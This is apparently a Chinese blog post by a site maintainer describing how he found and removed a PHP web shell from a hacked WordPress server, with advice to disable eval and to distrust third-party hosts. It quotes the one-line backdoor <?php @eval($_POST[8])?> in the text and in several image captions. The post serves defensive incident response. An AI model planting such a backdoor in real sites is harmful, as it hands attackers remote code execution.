首先,他的网站用的是wordpress OS(最近漏洞消息不断,我昨天收到的邮件里,有一封是关于这个)
![<?php @eval($_POST[8])?>_java](https://s2.51cto.com/images/blog/202103/05/3e5546ef3eca39ef856b59be1959cb83.jpeg?x-oss-process=image/resize,m_fixed,w_1184)
![<?php @eval($_POST[8])?>_java_02](https://s2.51cto.com/images/blog/202103/05/90de6f4282cb0902a5e1037ab02c650a.png?x-oss-process=image/resize,m_fixed,w_1184)
这里插一句,全球有27%左右的网站用的这个系统。
至于那台服务器是如何被入侵的,我看了一看服务器了的文件,有连个个.php文件:
![<?php @eval($_POST[8])?>_java_03](https://s2.51cto.com/images/blog/202103/05/6bddc73049826572a7cfb440886809b3.png?x-oss-process=image/resize,m_fixed,w_1184)
里面的代码就是我写的标题。![<?php @eval($_POST[8])?>_java_04](https://s2.51cto.com/images/blog/202103/05/316919bdb302647b35f05d7cd43ce4d9.png?x-oss-process=image/resize,m_fixed,w_1184)
这是传说中的一句话木马。eval可以用来执行任何其他php代码,危险系数比较大。
删掉这些文件,密码改掉,可能的漏洞已修补,完事(这几天没有收到信息,不过过几天怎么样,哈哈就不敢说了)。
有的网站的站长,有些是不懂技术的,对上上边的这个eval函数,不用的话最好禁止一下。
下面是我找的禁止函数的方法。
![<?php @eval($_POST[8])?>_java_05](https://s2.51cto.com/images/blog/202103/05/e8086b36025a3c9eeb76547f5a5dc09f.png?x-oss-process=image/resize,m_fixed,w_1184)
有不少的站长,在维护自己的服务器的时候,托管方要找点靠谱点的,我说的这台服务器就是交给了第三方,我不敢说他们和黑产有多少联系,不过还是小心点好。
